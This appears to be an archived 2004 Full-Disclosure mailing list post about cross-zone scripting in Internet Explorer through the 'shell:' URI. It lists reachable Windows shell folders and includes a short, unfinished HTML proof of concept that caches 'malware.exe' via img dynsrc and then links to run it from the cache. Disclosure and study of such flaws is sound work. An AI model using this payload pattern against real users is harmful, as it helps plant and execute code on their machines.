[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Re: Possible new cross zone scripting in IE

To: <full-disclosure@lists.netsys.com>
Subject: [Full-Disclosure] Re: Possible new cross zone scripting in IE
From: "http-equiv@excite.com" <1@malware.com>
Date: Tue, 10 Feb 2004 17:36:42 -0000


 <!--

Cheng Peng Su Wrote:

<a href="shell:My Music" 

 -->

Excellent ! The revival of the Pull's shell game: 

"directoryInfo.html", ie the "file://::{CLSID}"

[see: http://www.securityfocus.com/bid/3867/]


The following on this so-called Microsoft Windows XP machine:

Control Panel 
Administrative Tools 
Cache 
CD Burning 
Cookies
Desktop
Favorites
Fonts 
History 
Application Data 
Local Settings 
My Music 
My Pictures 
My Video 
NetHood 
Personal [my documents] 
PrintHood 
Programs 
Recent 
SendTo 
Start Menu 
Startup 
Templates

http://www.malware.com/shell.game.html

"Cache" can be very interesting 

<img dynsrc="malware.exe">
<a href="shell:Cache\malware.exe">Cache</a>

needs to be worked on...


-- 
http://www.malware.com






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] home land tracker software
Next by Date: [Full-Disclosure] EEYE: Microsoft ASN.1 Library Bit String Heap Corruption
Previous by thread: RE: [Full-Disclosure] Re: DoomJuice.A, Mydoom.A source code
Next by thread: [Full-Disclosure] EEYE: Microsoft ASN.1 Library Bit String Heap Corruption
Index(es):
- Date
- Thread